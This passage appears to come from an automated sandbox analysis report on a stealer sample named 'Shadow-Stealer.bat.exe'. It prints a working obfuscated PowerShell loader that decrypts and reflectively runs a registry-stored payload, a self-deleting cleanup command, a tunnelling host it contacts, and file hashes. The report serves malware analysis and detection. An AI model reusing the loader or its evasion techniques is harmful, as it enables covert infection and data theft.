'')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYBBv03aq6fIf9zugDa03cb0yO24aIfe5AFN+zOGDLKtWrsyyIVpjarzDCbBlxkhPRynAyHBM2A5pmzVa2gAc2+o8odD180Z07f5ZL3mYwTO8G4arHTtORWkqMdtdm7CA=');$tgmGC = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tgmGC, 0, $tgmGC.Length);$tgmGC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tgmGC);$zvkCv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JVVxi793TWK0eiazbMjyxQ==');$zvkCv = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zvkCv, 0, $zvkCv.Length);$zvkCv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($zvkCv);$MrvyW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('y9CiMcnIF08D1mbStDfFzg==');$MrvyW = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MrvyW, 0, $MrvyW.Length);$MrvyW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MrvyW);$UFhRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4Gkz3kktZWs5v4iY/fwpuA==');$UFhRe = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UFhRe, 0, $UFhRe.Length);$UFhRe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] 
-join '')($UFhRe);$BdNHQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mWujaRBJ7Bka6/SLPc2zjg==');$BdNHQ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BdNHQ, 0, $BdNHQ.Length);$BdNHQ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BdNHQ);$NXCWg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JS1eCTl+J3Vy2lPum4BV+A==');$NXCWg = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NXCWg, 0, $NXCWg.Length);$NXCWg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NXCWg);$UMIrZ0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xun+s5YVAeQzgGPJKptAJw==');$UMIrZ0 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ0, 0, $UMIrZ0.Length);$UMIrZ0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ0);$UMIrZ1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tKxTd8rUmwwPDWYqtJ+flg==');$UMIrZ1 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ1, 0, $UMIrZ1.Length);$UMIrZ1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ1);$UMIrZ2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QwPWmxWc7oP0xMzohMzOyA==');$UMIrZ2 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ2, 0, $UMIrZ2.Length);$UMIrZ2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ2);$UMIrZ3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('00EoyZz50MzeF+YVDb5OyQ==');$UMIrZ3 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ3, 0, $UMIrZ3.Length);$UMIrZ3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ3);$qsFQP.Dispose();$xCaUG1.Dispose();if (@(get-process -ea silentlycontinue $UMIrZ3).count -gt 1) {exit};$dINWW = [Microsoft.Win32.Registry]::$BdNHQ.$UFhRe($UMIrZ).$MrvyW($PYyQA);$QJXfU=[string[]]$dINWW.Split('\');$flTmo=nnKof(VOHZF([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 
'')($QJXfU[1])));vzvJZ $flTmo (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$iBTnS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[0]);$xCaUG = New-Object System.Security.Cryptography.AesManaged;$xCaUG.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$CTnvz = $xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')();$iBTnS = $CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iBTnS, 0, $iBTnS.Length);$CTnvz.Dispose();$xCaUG.Dispose();$ABMbT = New-Object System.IO.MemoryStream(, $iBTnS);$FswzF = New-Object System.IO.MemoryStream;$ZWQus = New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::$UMIrZ1);$ZWQus.$NXCWg($FswzF);$ZWQus.Dispose();$ABMbT.Dispose();$FswzF.Dispose();$iBTnS = $FswzF.ToArray();$JJwWP = $tgmGC | IEX;$kXIpu = $JJwWP::$UMIrZ2($iBTnS);$OPPDg = $kXIpu.EntryPoint;$OPPDg.$UMIrZ0($null, (, [string[]] ($roofG)))
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{34da9efd-bc13-45a5-9d1a-5be862586030}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{be0e7d18-2e6c-4e3a-90c8-b7afba5aa508}
C:\Windows\$sxr-powershell.exe
"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3376).WaitForExit();[System.Threading.Thread]::Sleep(5000); function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join 
'').('gnirtSteG'[-1..-9] -join '')($UMIrZ);$PYyQA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYBBv03aq6fIf9zugDa03cb0yO24aIfe5AFN+zOGDLKtWrsyyIVpjarzDCbBlxkhPRynAyHBM2A5pmzVa2gAc2+o8odD180Z07f5ZL3mYwTO8G4arHTtORWkqMdtdm7CA=');$tgmGC = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tgmGC, 0, $tgmGC.Length);$tgmGC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tgmGC);$zvkCv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JVVxi793TWK0eiazbMjyxQ==');$zvkCv = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zvkCv, 0, $zvkCv.Length);$zvkCv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($zvkCv);$MrvyW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('y9CiMcnIF08D1mbStDfFzg==');$MrvyW = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MrvyW, 0, $MrvyW.Length);$MrvyW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MrvyW);$UFhRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4Gkz3kktZWs5v4iY/fwpuA==');$UFhRe = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join 
'')($UFhRe, 0, $UFhRe.Length);$UFhRe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UFhRe);$BdNHQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mWujaRBJ7Bka6/SLPc2zjg==');$BdNHQ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BdNHQ, 0, $BdNHQ.Length);$BdNHQ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BdNHQ);$NXCWg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JS1eCTl+J3Vy2lPum4BV+A==');$NXCWg = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NXCWg, 0, $NXCWg.Length);$NXCWg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NXCWg);$UMIrZ0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xun+s5YVAeQzgGPJKptAJw==');$UMIrZ0 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ0, 0, $UMIrZ0.Length);$UMIrZ0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ0);$UMIrZ1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tKxTd8rUmwwPDWYqtJ+flg==');$UMIrZ1 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ1, 0, $UMIrZ1.Length);$UMIrZ1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ1);$UMIrZ2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QwPWmxWc7oP0xMzohMzOyA==');$UMIrZ2 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ2, 0, $UMIrZ2.Length);$UMIrZ2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ2);$UMIrZ3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('00EoyZz50MzeF+YVDb5OyQ==');$UMIrZ3 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ3, 0, $UMIrZ3.Length);$UMIrZ3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ3);$qsFQP.Dispose();$xCaUG1.Dispose();if (@(get-process -ea silentlycontinue $UMIrZ3).count -gt 1) {exit};$dINWW = 
[Microsoft.Win32.Registry]::$BdNHQ.$UFhRe($UMIrZ).$MrvyW($PYyQA);$QJXfU=[string[]]$dINWW.Split('\');$flTmo=nnKof(VOHZF([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[1])));vzvJZ $flTmo (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$iBTnS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[0]);$xCaUG = New-Object System.Security.Cryptography.AesManaged;$xCaUG.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$CTnvz = $xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')();$iBTnS = $CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iBTnS, 0, $iBTnS.Length);$CTnvz.Dispose();$xCaUG.Dispose();$ABMbT = New-Object System.IO.MemoryStream(, $iBTnS);$FswzF = New-Object System.IO.MemoryStream;$ZWQus = New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::$UMIrZ1);$ZWQus.$NXCWg($FswzF);$ZWQus.Dispose();$ABMbT.Dispose();$FswzF.Dispose();$iBTnS = $FswzF.ToArray();$JJwWP = $tgmGC | IEX;$kXIpu = $JJwWP::$UMIrZ2($iBTnS);$OPPDg = $kXIpu.EntryPoint;$OPPDg.$UMIrZ0($null, (, [string[]] ($roofG)))
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{5194bba6-089c-407d-961a-c0a6163ad991}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{96c33985-81e6-4e05-9bbe-da1980776803}
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{159c1918-d815-4e9a-b657-4504d0c9c6b0}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{dde74d24-75e2-4b87-92ce-3f3e0102344f}
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2892 -ip 2892
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 156
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{7614eb74-0942-4b90-9c42-88b23fff0a53}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{bf6b6f95-deda-4803-b2a0-5aa1592b2deb}
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 5480 -ip 5480
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5480 -s 476
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{8f615197-7f83-426f-bcb7-797e9a5d7bcc}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{ca3d5849-971f-46fa-b6ea-8e33e4c20a40}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{40d50a0c-a320-4ac2-a877-2d461bbf1d53}
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{ad978389-d6e9-450a-b0c6-360a9b71acf8}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{56fef73a-7b3e-41cb-9dec-bc3ea2609aac}
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{e33ab120-c4f4-44f4-b064-46101783cf7a}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{980745c6-a03c-4fd2-b338-9772e64035ba}
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 5732 -ip 5732
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5732 -s 476
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{bf65b796-427b-4c14-8060-f7bb17b83de9}
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 688 -p 5532 -ip 5532
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{22216ce1-e38d-4ceb-89da-003019ff7b6a}
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5532 -s 312
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 6064 -ip 6064
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6064 -s 476
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe" & exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\PING.EXE
PING localhost -n 8
C:\Windows\system32\taskkill.exe
taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe"
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\system32\attrib.exe
ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe"
C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:Global.Accounts.AppXqe94epy97qwa6w3j6w132e8zvcs117nd.mca
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 408 -p 3732 -ip 3732
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3732 -s 940
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe
| MD5 | 0e9ccd796e251916133392539572a374 |
| SHA1 | eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204 |
| SHA256 | c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221 |
| SHA512 | e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uee1a3a3.oxg.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Windows\$sxr-mshta.exe
| MD5 | 356e04e106f6987a19938df67dea0b76 |
| SHA1 | f2fd7cde5f97427e497dfb07b7f682149dc896fb |
| SHA256 | 4ed8a115fa1dcfd532397b800775c1b54d2d407b52118b5423e94ff1ce855d7e |
| SHA512 | df1c655fa3a95e001084af8c3aa97c54dbcb690210e1353dd836702cfb4af3c857449df62aa62d7ab525ffb4e0dc1552181dfcdee2c28f4af5c20df6d95811cd |
C:\Windows\$sxr-cmd.exe
| MD5 | c5db7b712f280c3ae4f731ad7d5ea171 |
| SHA1 | e8717ff0d40e01fd3b06de2aa5a401bed1c907cc |
| SHA256 | f6c9532e1f4b66be96f0f56bd7c3a3c1997ea8066b91bfcc984e41f072c347ba |
| SHA512 | bceaf7dc30f2c99b40b7025a5eb063f3131a1ef9349fdf356720eaef838bcf58ce3d5e3bad9459ddd2f872df430bdb66a766a5acff5d3bbc738eba8945cb0a89 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.3de27bd6-27d3-4e8b-8fb8-ed8767f6d008.tmp.csv
| MD5 | 7063770dc9c0bfd9224d259979ff24d0 |
| SHA1 | 996fa6a4cd8dbe3e95e22642a2d6896c5024a8f1 |
| SHA256 | 3221a00201b27de4df7a6156b6c9d1beb8f431584f4ffcce1b010ecbb27fc738 |
| SHA512 | 75e8a4499fb9e1eeed31dfccc247d115c26887498b6ba6ad28a96c93974ab33513072805a1c6e43f19ecfc9e89283da7040a55b155fd144827b5901d3ed37481 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.6f8a75da-a379-4005-81bb-d5cfc52bf66b.tmp.txt
| MD5 | 5b8b8068b70178bdd1483260e217005f |
| SHA1 | d86c188fa292eb90dbbea10dc436f08a4f4b7d7d |
| SHA256 | dbbdee25e509424692054df561c393aaae51ee8fb80b873323a15152b1b4bde7 |
| SHA512 | d54e6140a28c4575ab98be30e4290cf4defdb873214379f58c651e496c79ea94572369133945510b7d54d6e63e71c3711f4c02ef360d4212996e199fb84867dc |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.b7dc8a3a-917a-4108-aa68-babea3ea7976.tmp.csv
| MD5 | 5084e8d0b89b8deb8fe1332866c55c28 |
| SHA1 | 310daebcc4d4a1c3f596826324ca3444786f3b56 |
| SHA256 | a1ab8d1104743938c60543f0d869ba6810a0918f39f2ff75b61791ecb9e33429 |
| SHA512 | fa21f03f09d6095ab1d60907c56f2a8025931df311c2fabfa631d2c348b3fa9d66e5c5e17b7d1f5ee09d464d415dd8d949a79db10da47d9df61418f4ea67b589 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.b887b74b-fc56-4986-9735-6b2e57235bca.tmp.txt
| MD5 | 48a532728c1b15dc689bc65579f7117d |
| SHA1 | 2b8ed745721c0152553a6a9a6d7d2df023dd605b |
| SHA256 | 8a79d5b5dfd9cc891678e5fd58f229dc3aadaceec769d435dc1ca3dc1611764b |
| SHA512 | bb2141c3966062351b85406d45845039a7c292efcf7617e5e35ebffde2b705bb6c1005920326b26ba22b57115ecd387d0c2e2cf682b1e0c8af87f966fd68c245 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.ada51214-6507-4896-8df6-667eb1b78be9.tmp.csv
| MD5 | 01cb1d4788f45c401ab79452e5ba54c8 |
| SHA1 | f5044f4415229350f313551c3d8221a7775e5767 |
| SHA256 | 5225483c288be5934f80e3da246bc20f49b8b85e87fd74d1e9e6c6fb229ecd2a |
| SHA512 | 1059a6e3a10dfa77ecf8cea94734f6787adca0a3ef9663c620029047ea8a52d32114a7d98057e875dc711d15e0da577e4efbf76eb8d0ac78a1fea40a16d0232f |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.bb5d6639-1f2b-4ff2-b97d-0a444c98fe71.tmp.txt
| MD5 | 068d45478c1a2de352808afef100814e |
| SHA1 | b41065c9ffe1cb525da16aa856c2cfaafce2d82f |
| SHA256 | 9947084d90b2627cd48ea3552cb24943dfacb1d54f72cde8724b0ac2fabd93bc |
| SHA512 | f81bea8eb91462e1ca1298380cfdd9c446580c60b76b91bb86798d79c533548fc305378060e3d43e09dfcc1223b175d225f551163d026e67c61cbfa08675a403 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.96a06089-492f-42f6-b935-86a105cb6905.tmp.csv
| MD5 | 95cb02d483fe046902d3b478920a5658 |
| SHA1 | a9a08b5aa0fe9d8e37d38d251df3b61cbeed027f |
| SHA256 | 0217b3642b98ee92d4947c252a6460b5a69723872819f2b553149e2035133f5b |
| SHA512 | 7c627629cf83d85b76f6fe9e2cd968dd1795627d81a6bb22fa451db63d40caa5d77533432313eaa65def4aa1b21756b53d3f8cf02e35c18e1eec9b1e1dcf7404 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.6bc79591-81e3-462e-9757-2417cf610904.tmp.txt
